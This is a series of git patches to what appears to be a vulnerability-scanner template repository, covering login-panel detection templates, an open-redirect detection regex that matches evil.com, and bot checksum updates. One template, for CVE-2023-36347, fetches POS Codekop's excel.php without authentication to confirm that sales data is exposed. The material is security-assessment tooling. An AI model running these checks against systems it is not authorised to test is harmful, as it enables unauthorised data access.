No newline at end of file From d74df498cf3b1d051e0ee8d8aadd86b6640e5984 Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO Date: Sun, 12 May 2024 19:54:17 +0200 Subject: [PATCH 0838/1768] Fix linter error --- http/exposed-panels/qlikview-accesspoint-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index 88738607fc..ba31920c7c 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -19,7 +19,7 @@ http: - method: GET path: - "{{BaseURL}}" - + redirects: true max-redirects: 3 @@ -28,4 +28,4 @@ http: dsl: - 'status_code == 200' - 'contains_any(to_lower(body), "qlikview - accesspoint", "alt=\"qlikview")' - condition: and \ No newline at end of file + condition: and From 903c94b70783bed2e1e21df6026296d9a3ed8f79 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 May 2024 09:13:34 +0530 Subject: [PATCH 0839/1768] Create CVE-2023-36347.yaml --- http/cves/2023/CVE-2023-36347.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2023/CVE-2023-36347.yaml diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml new file mode 100644 index 0000000000..8e57fd953f --- /dev/null +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-36347 + +info: + name: POS Codekop v2.0 - Broken Authentication + author: princechaddha + severity: high + description: A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data. + impact: | + Successful exploitation could lead to unauthorized access to sensitive information. + remediation: | + Implement proper authentication mechanisms and ensure secure user session management. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-36347 + cwe-id: CWE-306 + epss-score: 0.00103 + epss-percentile: 0.41216 + cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* + metadata: + vendor: codekop + product: codekop + tags: cve,cve2023,codekop,pos,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/excel.php" + - "{{BaseURL}}/pos-kasir-php/excel.php" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Document" + + - type: word + part: header + words: + - "application/vnd.ms-excel" From 56b6572321589e88fb0f90b77b4cba48b3cadd2f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 13 May 2024 10:08:29 +0530 Subject: [PATCH 0840/1768] fix FN --- http/exposed-panels/qlikview-accesspoint-panel.yaml | 13 ++++++------- 1 file changed, 6 insertions(+), 7 deletions(-) diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml index ba31920c7c..73e33204f8 100644 --- a/http/exposed-panels/qlikview-accesspoint-panel.yaml +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -7,25 +7,24 @@ info: description: | QlikView AccessPoint login panel was detected. reference: - - https://www.qlik.com/ - https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm metadata: - max-request: 1 verified: true - shodan-query: http.title:"QlikView - AccessPoint" + max-request: 1 + shodan-query: title:"QlikView - AccessPoint" tags: panel,qlikview,login,detect http: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}/qlikview/FormLogin.htm" - redirects: true - max-redirects: 3 + host-redirects: true + max-redirects: 2 matchers: - type: dsl dsl: - 'status_code == 200' - - 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")' + - 'contains_any(to_lower(body), "qlikview - accesspoint", "alt=\"qlikview")' condition: and From bded94df29937c62154bd09d7e8e0dbce666c7af Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 08:42:57 +0330 Subject: [PATCH 0841/1768] Add ackee-panel.yaml --- http/exposed-panels/ackee-panel.yaml | 35 ++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/ackee-panel.yaml diff --git a/http/exposed-panels/ackee-panel.yaml b/http/exposed-panels/ackee-panel.yaml new file mode 100644 index 0000000000..a93921badc --- /dev/null +++ b/http/exposed-panels/ackee-panel.yaml @@ -0,0 +1,35 @@ +id: ackee-panel + +info: + name: Ackee Panel - Detect + author: userdehghani + severity: info + description: | + self-hosted, node.js based analytics tool for those who care about privacy. + reference: + - https://ackee.electerious.com/ + - https://docs.ackee.electerious.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1495233116 + tags: panel,ackee,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - '<title>Ackee' + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"-1495233116\" == mmh3(base64_py(body)))" \ No newline at end of file From 6295ebaf046bb69223873537a18427b697c25f93 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 08:57:45 +0330 Subject: [PATCH 0842/1768] Add nocodb-panel.yaml --- http/exposed-panels/nocodb-panel.yaml | 35 +++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 http/exposed-panels/nocodb-panel.yaml diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml new file mode 100644 index 0000000000..17fa2772f9 --- /dev/null +++ b/http/exposed-panels/nocodb-panel.yaml @@ -0,0 +1,35 @@ +id: nocodb-panel + +info: + name: NocoDB Panel - Detect + author: userdehghani + severity: info + description: | + no-code database platform that allows teams to collaborate and build applications with ease of a familiar and intuitive spreadsheet interface + reference: + - https://www.nocodb.com/ + - https://docs.nocodb.com/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:206985584 + tags: panel,nocodb,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/dashboard/#/signin" + - "{{BaseURL}}/dashboard/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'content="NocoDB' + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" \ No newline at end of file From 429cefb3beef92158ddfbd95ce48a56cc898f9d5 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 09:19:51 +0330 Subject: [PATCH 0843/1768] Update matomo-login-portal.yaml --- http/exposed-panels/matomo-login-portal.yaml | 34 --------------- http/exposed-panels/matomo-panel.yaml | 45 ++++++++++++++++++++ 2 files changed, 45 insertions(+), 34 deletions(-) delete mode 100644 http/exposed-panels/matomo-login-portal.yaml create mode 100644 http/exposed-panels/matomo-panel.yaml diff --git a/http/exposed-panels/matomo-login-portal.yaml b/http/exposed-panels/matomo-login-portal.yaml deleted file mode 100644 index 7acc2f4b04..0000000000 --- a/http/exposed-panels/matomo-login-portal.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: matomo-login-portal - -info: - name: Matomo Login Panel - Detect - author: Arr0way - severity: info - description: Matomo logjn panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cwe-id: CWE-200 - cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - product: matomo - vendor: matomo - tags: panel,matomo - -http: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/matomo" - - stop-at-first-match: true - host-redirects: true - max-redirects: 2 - matchers: - - type: word - part: body - words: - - "Sign in" - - "Matomo" - condition: and -# digest: 4a0a0047304502201c4b93876d4b04d9b5b75c8c17fe6d03ec45002b413803af50ee269c8086c434022100ee5a2b5964c46e904239af345684bc5b2b5f2ebfba45afabdb42f040ca828a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml new file mode 100644 index 0000000000..fc32f136ce --- /dev/null +++ b/http/exposed-panels/matomo-panel.yaml @@ -0,0 +1,45 @@ +id: matomo-panel + +info: + name: Matomo Panel - Detect + author: Arr0way userdehghani + severity: info + description: | + google analytics alternative that protects your data and your customers privacy. + reference: + - https://matomo.org/ + - https://matomo.org/faq/on-premise/installing-matomo/#getting-started + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cwe-id: CWE-200 + cpe: cpe:2.3:a:matomo:matomo:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + product: matomo + vendor: matomo + shodan-query: http.favicon.hash:-2023266783 + tags: panel,matomo,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}/index.php" + - "{{BaseURL}}/plugins/CoreHome/images/favicon.png" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'Sign in - Matomo' + - 'content="Matomo' + - 'title="Matomo' + condition: or + case-insensitive: true + + - type: dsl + dsl: + - "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))" \ No newline at end of file From 5d93d29b13fd0afdaa6581cd0c8fee88dcf61d44 Mon Sep 17 00:00:00 2001 From: "M. Dehghani" <mohammadamindehghani@pm.me> Date: Mon, 13 May 2024 10:14:03 +0330 Subject: [PATCH 0844/1768] Update jfrog-login.yaml --- http/exposed-panels/jfrog-login.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 6f55f59c98..6791e47677 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -12,20 +12,22 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,jfrog,edb + shodan-query: http.title:"JFrog" + tags: panel,jfrog,edb,detect,login http: - method: GET path: - '{{BaseURL}}/ui/login/' + - '{{BaseURL}}/ui/favicon.ico' matchers-condition: and matchers: - type: word words: - '<title>JFrog' + case-insensitive: true - - type: status - status: - - 200 -# digest: 4b0a00483046022100bfa95e2d95db535d51023522742e67105a4ca44c2195a7bcae99ff18a8a3e215022100cc08d7c15e5b503a664ce40eeeb750549e654f290a8266192954330d210549ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: dsl + dsl: + - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" \ No newline at end of file From 053f4dac26f188f6095d7da918c528be1c95f48b Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 10:23:38 +0330 Subject: [PATCH 0845/1768] Update open-redirect.yaml --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index d06fd5dde9..d31e0ad413 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -172,7 +172,7 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - type: status status: From 57486dba3f9e80f9a5d01be9d2b7a232b0cc6091 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 10:36:07 +0330 Subject: [PATCH 0846/1768] Update regex101 --- dast/vulnerabilities/redirect/open-redirect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index d31e0ad413..58b8687d39 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -172,11 +172,11 @@ http: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 - type: status status: - 301 - 302 - 307 -# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009817b3fc85a64de37095f99e9bc9606b18a5a9ee3273af0405634e1b2760458c02201a1430837a69b1a03bece85a3966c0042aaddc52f45baedb9191e95936860b0c:922c64590222798bb761d5b6d8e72950 From 4358527eea0d4d4320f77e487e4f336e2383b2a9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 12:37:16 +0530 Subject: [PATCH 0847/1768] minor update --- http/cves/2023/CVE-2023-36347.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 8e57fd953f..15e437dfc1 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -4,7 +4,8 @@ info: name: POS Codekop v2.0 - Broken Authentication author: princechaddha severity: high - description: A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data. + description: | + A broken authentication mechanism in the endpoint excel.php of POS Codekop v2.0 allows unauthenticated attackers to download selling data. impact: | Successful exploitation could lead to unauthorized access to sensitive information. remediation: | From 343aa0f6acd4a95afdb0b57d6453e14c8a589688 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:10:23 +0000 Subject: [PATCH 0848/1768] Auto Generated New Template Addition List [Mon May 13 07:10:23 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 2d8595fdb8..ef0e7a9798 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml @@ -6,4 +7,5 @@ http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/craftercms-detect.yaml +http/technologies/statamic-detect.yaml http/technologies/tinyproxy-detect.yaml From 5fcc10e4138e3fa3e30fcab735f2aa7ce2a532d6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:10:34 +0000 Subject: [PATCH 0849/1768] Auto Generated Templates Checksum [Mon May 13 07:10:34 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8ddf9e1922..b9fb30da51 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3077,6 +3077,7 @@ http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b +http/cves/2023/CVE-2023-36347.yaml:25da245678a22835df7302ab8224f5c565c3ab05 http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672 http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259 http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef @@ -6911,7 +6912,7 @@ http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 http/technologies/spring-detect.yaml:915d140e39b0fd25c725861c526bd2852d3af20a http/technologies/springboot-actuator.yaml:eea78a3c5ccc81b70826132839dd3531ebc07667 http/technologies/springboot-whitelabel.yaml:eb9058fb153f9146a1c1805473ec96199b243184 -http/technologies/statamic-detect.yaml:fe34eae871715d76c164d89ebe0b6c023b51243d +http/technologies/statamic-detect.yaml:9b14322353da40d62d366fab6d4e882025a6d761 http/technologies/strapi-cms-detect.yaml:ab2db3c715882e9487d6cfce22845c3cfb6a5168 http/technologies/subrion-cms-detect.yaml:79c424841060d17ac25109a9ec520c7e0c208bea http/technologies/sucuri-firewall.yaml:4e60a53d2ddcc7b48dc6fcb42149747927a140b4 @@ -8509,7 +8510,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:064e83986d9c777dd50b8e1c049b4504b0504818 +templates-checksum.txt:39a7e0cec9edf7bd2ca8cf594a31545607091e43 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 345eaea194590d6d118184283c171c8e902d6a20 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:11:20 +0000 Subject: [PATCH 0850/1768] Auto Generated New Template Addition List [Mon May 13 07:11:20 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ef0e7a9798..4c86240f5c 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml From 2582b7c569a38f88101d341c19f14d22461f9437 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:11:29 +0000 Subject: [PATCH 0851/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index db0d204223..d49650ae17 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,6 +3,7 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-36347.yaml' - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' @@ -11,6 +12,7 @@ on: - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/craftercms-detect.yaml' + - 'http/technologies/statamic-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' workflow_dispatch: jobs: From 4529aaeb9af320f29cf467962520978e99921839 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:11:42 +0000 Subject: [PATCH 0852/1768] Auto Generated Templates Checksum [Mon May 13 07:11:42 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b9fb30da51..7156777c2d 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4233,6 +4233,7 @@ http/exposed-panels/pypicloud-panel.yaml:a8e13404f2ea40b2acaad8749a8c69b862e3b5e http/exposed-panels/qBittorrent-panel.yaml:0b49b83c08748b4b91db7e36fb06518a6d08ec88 http/exposed-panels/qdpm-login-panel.yaml:8f5b3e24b7156ab64d0d391ae05c299118ced753 http/exposed-panels/qlik-sense-server.yaml:4db84c0d1e3d5c1cfab2307ce8711291a039c6da +http/exposed-panels/qlikview-accesspoint-panel.yaml:6d6bd76d548c8b60544fdb95b3e8ea9ac7fefd18 http/exposed-panels/qmail-admin-login.yaml:4ba2c84becd76232e9b799bbc3433797e3d5a1f4 http/exposed-panels/qnap/qnap-photostation-panel.yaml:c7692c948143c7affd3ec7447e5038fe3ab23c6d http/exposed-panels/qnap/qnap-qts-panel.yaml:4939e5e7c6952bee595287b84575fad48db6435a @@ -8510,7 +8511,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:39a7e0cec9edf7bd2ca8cf594a31545607091e43 +templates-checksum.txt:437f7d074cf075e18b475cce70f25038eff51a57 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7af0954423728fb03b6102a79c8dd14915f9a81e Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:12:05 +0000 Subject: [PATCH 0853/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d49650ae17..1334d4f766 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/qlikview-accesspoint-panel.yaml' - 'http/exposed-panels/unleash-panel.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' From 3d912c1cb9cb84adf4e1fd77e86582472e1b9108 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 10:42:14 +0330 Subject: [PATCH 0854/1768] Adding the name --- dast/vulnerabilities/redirect/open-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 58b8687d39..04b12668ea 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -2,7 +2,7 @@ id: open-redirect info: name: Open Redirect Detection - author: princechaddha + author: princechaddha, AmirHossein Raeisi severity: medium tags: redirect,dast From 2c67e03cd8aae0c8f97f6994ec581eed4cdcb96b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:12:15 +0000 Subject: [PATCH 0855/1768] Auto Template Signing [Mon May 13 07:12:15 UTC 2024] :robot: --- http/cves/2023/CVE-2023-36347.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-36347.yaml b/http/cves/2023/CVE-2023-36347.yaml index 15e437dfc1..7e0206581a 100644 --- a/http/cves/2023/CVE-2023-36347.yaml +++ b/http/cves/2023/CVE-2023-36347.yaml @@ -41,3 +41,4 @@ http: part: header words: - "application/vnd.ms-excel" +# digest: 4a0a00473045022077189be5ccce61297097eca131b1b294f7016b564239aa193f2d5f7e10fe3804022100f0e9a5eb809b62f99118a52f104c6347d099bf2f0aa8236cd2e35d766eede99e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 02f99c71ffdb984952789686438d4873698b0cd4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 12:46:14 +0530 Subject: [PATCH 0856/1768] minor update --- http/exposed-panels/jfrog-login.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/jfrog-login.yaml b/http/exposed-panels/jfrog-login.yaml index 6791e47677..8f9d6a30af 100644 --- a/http/exposed-panels/jfrog-login.yaml +++ b/http/exposed-panels/jfrog-login.yaml @@ -4,7 +4,8 @@ info: name: JFrog Login Panel - Detect author: dhiyaneshDK severity: info - description: JFrog login panel was detected. + description: | + JFrog login panel was detected. reference: - https://www.exploit-db.com/ghdb/6797 classification: @@ -13,6 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"JFrog" + verified: true tags: panel,jfrog,edb,detect,login http: @@ -21,7 +23,8 @@ http: - '{{BaseURL}}/ui/login/' - '{{BaseURL}}/ui/favicon.ico' - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: word words: @@ -30,4 +33,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-595620639\" == mmh3(base64_py(body)))" From 4d704580ad961377bbb23d9be1a171cd0768d410 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 12:49:55 +0530 Subject: [PATCH 0857/1768] minor update --- http/exposed-panels/matomo-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/matomo-panel.yaml b/http/exposed-panels/matomo-panel.yaml index fc32f136ce..840ab0a12a 100644 --- a/http/exposed-panels/matomo-panel.yaml +++ b/http/exposed-panels/matomo-panel.yaml @@ -2,7 +2,7 @@ id: matomo-panel info: name: Matomo Panel - Detect - author: Arr0way userdehghani + author: Arr0way,userdehghani severity: info description: | google analytics alternative that protects your data and your customers privacy. @@ -24,7 +24,7 @@ info: http: - method: GET path: - - "{{BaseURL}}/" + - "{{BaseURL}}" - "{{BaseURL}}/index.php" - "{{BaseURL}}/plugins/CoreHome/images/favicon.png" @@ -42,4 +42,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-2023266783\" == mmh3(base64_py(body)))" From 7887810c9e93e2be8626ffc280525772f412f366 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 13 May 2024 13:11:29 +0530 Subject: [PATCH 0858/1768] Update nocodb-panel.yaml --- http/exposed-panels/nocodb-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index 17fa2772f9..4b13399b47 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -5,7 +5,7 @@ info: author: userdehghani severity: info description: | - no-code database platform that allows teams to collaborate and build applications with ease of a familiar and intuitive spreadsheet interface + NocoDB Login panel was discovered. reference: - https://www.nocodb.com/ - https://docs.nocodb.com/ @@ -32,4 +32,4 @@ http: - type: dsl dsl: - - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" From 1031317bfc175efea792f9b7e327e46983e539d6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 13 May 2024 07:44:14 +0000 Subject: [PATCH 0859/1768] Auto Generated New Template Addition List [Mon May 13 07:44:14 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4c86240f5c..9883216bfc 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-36347.yaml http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/nocodb-panel.yaml http/exposed-panels/qlikview-accesspoint-panel.yaml http/exposed-panels/unleash-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml From 289af0c372699318be76e4ee4ac01d6f4112d087 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 May 2024 07:44:19 +0000 Subject: [PATCH 0860/1768] Auto Generated Templates Checksum [Mon May 13 07:44:19 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7156777c2d..1a57ba8249 100644 